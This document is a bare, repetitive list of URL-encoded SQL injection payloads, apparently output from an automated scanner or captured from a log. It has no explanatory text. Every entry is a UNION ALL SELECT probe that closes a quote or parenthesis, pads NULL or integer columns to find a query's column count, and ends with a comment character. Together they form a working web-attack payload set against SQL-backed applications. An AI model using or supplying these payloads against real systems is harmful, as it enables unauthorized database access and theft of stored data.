1%27%7C%7C%28SELECT%20%27qAEz%27%20FROM%20DUAL%20WHERE%202861%3D2861%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%7C%7C%28SELECT%20%27QmFz%27%20FROM%20DUAL%20WHERE%202686%3D2686%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%7C%7C%28SELECT%20%27xXKr%27%20FROM%20DUAL%20WHERE%204083%3D4083%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%7C%7C%28SELECT%20%27SNnU%27%20WHERE%206348%3D6348%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%7C%7C%28SELECT%20%27ZfGM%27%20WHERE%207213%3D7213%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%7C%7C%28SELECT%20%27rFvW%27%20WHERE%207351%3D7351%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%7C%7C%28SELECT%20%27leNA%27%20WHERE%206109%3D6109%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%7C%7C%28SELECT%20%27XqFa%27%20WHERE%208647%3D8647%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%7C%7C%28SELECT%20%27IqMg%27%20WHERE%203639%3D3639%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%7C%7C%28SELECT%20%27IJpR%27%20WHERE%203900%3D3900%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%7C%7C%28SELECT%20%27Idxt%27%20WHERE%208359%3D8359%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%7C%7C%28SELECT%20%27vdmz%27%20WHERE%205446%3D5446%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%7C%7C%28SELECT%20%27TJCF%27%20WHERE%202834%3D2834%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%2B%28SELECT%20zkvJ%20WHERE%205030%3D5030%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%2B%28SELECT%20fzqV%20WHERE%204050%3D4050%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%2B%28SELECT%20gZST%20WHERE%205041%3D5041%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%2B%28SELECT%20AyYL%20WHERE%205143%3D5143%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%2B%28SELECT%20gdpW%20WHERE%202587%3D2587%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%2B%28SELECT%20tHHu%20WHERE%207301%3D7301%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%2B%28SELECT%20wtGQ%20WHERE%202217%3D2217%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%2B%28SELECT%20nJWM%20WHERE%201673%3D1673%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%2B%28SELECT%20UYdW%20WHERE%205414%3D5414%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%2B%28SELECT%20iGmq%20WHERE%203974%3D3974%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%2B%28SELECT%20%27zWDI%27%20WHERE%208500%3D8500%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%2B%28SELECT%20%27tJQv%27%20WHERE%209436%3D9436%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%2B%28SELECT%20%27kCjT%27%20WHERE%207456%3D7456%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%2B%28SELECT%20%27ulis%27%20WHERE%207124%3D7124%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%2B%28SELECT%20%27bRZr%27%20WHERE%207784%3D7784%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%2B%28SELECT%20%27ssTD%27%20WHERE%203291%3D3291%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%2B%28SELECT%20%27FqWE%27%20WHERE%206393%3D6393%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%2B%28SELECT%20%27UvLa%27%20WHERE%203186%3D3186%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%2B%28SELECT%20%27MDpR%27%20WHERE%201492%3D1492%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%2B%28SELECT%20%27ftBS%27%20WHERE%206666%3D6666%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 -7011%29%20UNION%20ALL%20SELECT%204416%2C4416%2C4416%2C4416%2C4416%2C4416%2C4416%2C4416%2C4416%2C4416%2C4416%2C4416%2C4416%2C4416%2C4416%2C4416%2C4416%2C4416%2C4416%2C4416%2C4416%2C4416%2C4416%2C4416%2C4416%2C4416%2C4416%2C4416%2C4416%2C4416%2C4416%23 -8393%29%20UNION%20ALL%20SELECT%201098%2C1098%2C1098%2C1098%2C1098%2C1098%2C1098%2C1098%2C1098%2C1098%2C1098%2C1098%2C1098%2C1098%2C1098%2C1098%2C1098%2C1098%2C1098%2C1098%2C1098%2C1098%2C1098%2C1098%2C1098%2C1098%2C1098%2C1098%2C1098%2C1098%2C1098%2C1098%23 -2042%29%20UNION%20ALL%20SELECT%209634%2C9634%2C9634%2C9634%2C9634%2C9634%2C9634%2C9634%2C9634%2C9634%2C9634%2C9634%2C9634%2C9634%2C9634%2C9634%2C9634%2C9634%2C9634%2C9634%2C9634%2C9634%2C9634%2C9634%2C9634%2C9634%2C9634%2C9634%2C9634%2C9634%2C9634%2C9634%2C9634%23 -9025%29%20UNION%20ALL%20SELECT%208774%2C8774%2C8774%2C8774%2C8774%2C8774%2C8774%2C8774%2C8774%2C8774%2C8774%2C8774%2C8774%2C8774%2C8774%2C8774%2C8774%2C8774%2C8774%2C8774%2C8774%2C8774%2C8774%2C8774%2C8774%2C8774%2C8774%2C8774%2C8774%2C8774%2C8774%2C8774%2C8774%2C8774%23 -6801%29%20UNION%20ALL%20SELECT%202776%2C2776%2C2776%2C2776%2C2776%2C2776%2C2776%2C2776%2C2776%2C2776%2C2776%2C2776%2C2776%2C2776%2C2776%2C2776%2C2776%2C2776%2C2776%2C2776%2C2776%2C2776%2C2776%2C2776%2C2776%2C2776%2C2776%2C2776%2C2776%2C2776%2C2776%2C2776%2C2776%2C2776%2C2776%23 -8945%29%20UNION%20ALL%20SELECT%209800%2C9800%2C9800%2C9800%2C9800%2C9800%2C9800%2C9800%2C9800%2C9800%2C9800%2C9800%2C9800%2C9800%2C9800%2C9800%2C9800%2C9800%2C9800%2C9800%2C9800%2C9800%2C9800%2C9800%2C9800%2C9800%2C9800%2C9800%2C9800%2C9800%2C9800%2C9800%2C9800%2C9800%2C9800%2C9800%23 -4873%29%20UNION%20ALL%20SELECT%204232%2C4232%2C4232%2C4232%2C4232%2C4232%2C4232%2C4232%2C4232%2C4232%2C4232%2C4232%2C4232%2C4232%2C4232%2C4232%2C4232%2C4232%2C4232%2C4232%2C4232%2C4232%2C4232%2C4232%2C4232%2C4232%2C4232%2C4232%2C4232%2C4232%2C4232%2C4232%2C4232%2C4232%2C4232%2C4232%2C4232%23 -9478%29%20UNION%20ALL%20SELECT%209693%2C9693%2C9693%2C9693%2C9693%2C9693%2C9693%2C9693%2C9693%2C9693%2C9693%2C9693%2C9693%2C9693%2C9693%2C9693%2C9693%2C9693%2C9693%2C9693%2C9693%2C9693%2C9693%2C9693%2C9693%2C9693%2C9693%2C9693%2C9693%2C9693%2C9693%2C9693%2C9693%2C9693%2C9693%2C9693%2C9693%2C9693%23 -4452%29%20UNION%20ALL%20SELECT%204661%2C4661%2C4661%2C4661%2C4661%2C4661%2C4661%2C4661%2C4661%2C4661%2C4661%2C4661%2C4661%2C4661%2C4661%2C4661%2C4661%2C4661%2C4661%2C4661%2C4661%2C4661%2C4661%2C4661%2C4661%2C4661%2C4661%2C4661%2C4661%2C4661%2C4661%2C4661%2C4661%2C4661%2C4661%2C4661%2C4661%2C4661%2C4661%23 -6053%29%20UNION%20ALL%20SELECT%205506%2C5506%2C5506%2C5506%2C5506%2C5506%2C5506%2C5506%2C5506%2C5506%2C5506%2C5506%2C5506%2C5506%2C5506%2C5506%2C5506%2C5506%2C5506%2C5506%2C5506%2C5506%2C5506%2C5506%2C5506%2C5506%2C5506%2C5506%2C5506%2C5506%2C5506%2C5506%2C5506%2C5506%2C5506%2C5506%2C5506%2C5506%2C5506%2C5506%23 -4414%29%20UNION%20ALL%20SELECT%203951%2C3951%2C3951%2C3951%2C3951%2C3951%2C3951%2C3951%2C3951%2C3951%2C3951%2C3951%2C3951%2C3951%2C3951%2C3951%2C3951%2C3951%2C3951%2C3951%2C3951%2C3951%2C3951%2C3951%2C3951%2C3951%2C3951%2C3951%2C3951%2C3951%2C3951%23 -4100%29%20UNION%20ALL%20SELECT%204225%2C4225%2C4225%2C4225%2C4225%2C4225%2C4225%2C4225%2C4225%2C4225%2C4225%2C4225%2C4225%2C4225%2C4225%2C4225%2C4225%2C4225%2C4225%2C4225%2C4225%2C4225%2C4225%2C4225%2C4225%2C4225%2C4225%2C4225%2C4225%2C4225%2C4225%2C4225%23 -7168%29%20UNION%20ALL%20SELECT%209203%2C9203%2C9203%2C9203%2C9203%2C9203%2C9203%2C9203%2C9203%2C9203%2C9203%2C9203%2C9203%2C9203%2C9203%2C9203%2C9203%2C9203%2C9203%2C9203%2C9203%2C9203%2C9203%2C9203%2C9203%2C9203%2C9203%2C9203%2C9203%2C9203%2C9203%2C9203%2C9203%23 -1849%29%20UNION%20ALL%20SELECT%206450%2C6450%2C6450%2C6450%2C6450%2C6450%2C6450%2C6450%2C6450%2C6450%2C6450%2C6450%2C6450%2C6450%2C6450%2C6450%2C6450%2C6450%2C6450%2C6450%2C6450%2C6450%2C6450%2C6450%2C6450%2C6450%2C6450%2C6450%2C6450%2C6450%2C6450%2C6450%2C6450%2C6450%23 -7111%29%20UNION%20ALL%20SELECT%203224%2C3224%2C3224%2C3224%2C3224%2C3224%2C3224%2C3224%2C3224%2C3224%2C3224%2C3224%2C3224%2C3224%2C3224%2C3224%2C3224%2C3224%2C3224%2C3224%2C3224%2C3224%2C3224%2C3224%2C3224%2C3224%2C3224%2C3224%2C3224%2C3224%2C3224%2C3224%2C3224%2C3224%2C3224%23 -9489%29%20UNION%20ALL%20SELECT%205259%2C5259%2C5259%2C5259%2C5259%2C5259%2C5259%2C5259%2C5259%2C5259%2C5259%2C5259%2C5259%2C5259%2C5259%2C5259%2C5259%2C5259%2C5259%2C5259%2C5259%2C5259%2C5259%2C5259%2C5259%2C5259%2C5259%2C5259%2C5259%2C5259%2C5259%2C5259%2C5259%2C5259%2C5259%2C5259%23 -6997%29%20UNION%20ALL%20SELECT%207428%2C7428%2C7428%2C7428%2C7428%2C7428%2C7428%2C7428%2C7428%2C7428%2C7428%2C7428%2C7428%2C7428%2C7428%2C7428%2C7428%2C7428%2C7428%2C7428%2C7428%2C7428%2C7428%2C7428%2C7428%2C7428%2C7428%2C7428%2C7428%2C7428%2C7428%2C7428%2C7428%2C7428%2C7428%2C7428%2C7428%23 -7173%29%20UNION%20ALL%20SELECT%209910%2C9910%2C9910%2C9910%2C9910%2C9910%2C9910%2C9910%2C9910%2C9910%2C9910%2C9910%2C9910%2C9910%2C9910%2C9910%2C9910%2C9910%2C9910%2C9910%2C9910%2C9910%2C9910%2C9910%2C9910%2C9910%2C9910%2C9910%2C9910%2C9910%2C9910%2C9910%2C9910%2C9910%2C9910%2C9910%2C9910%2C9910%23 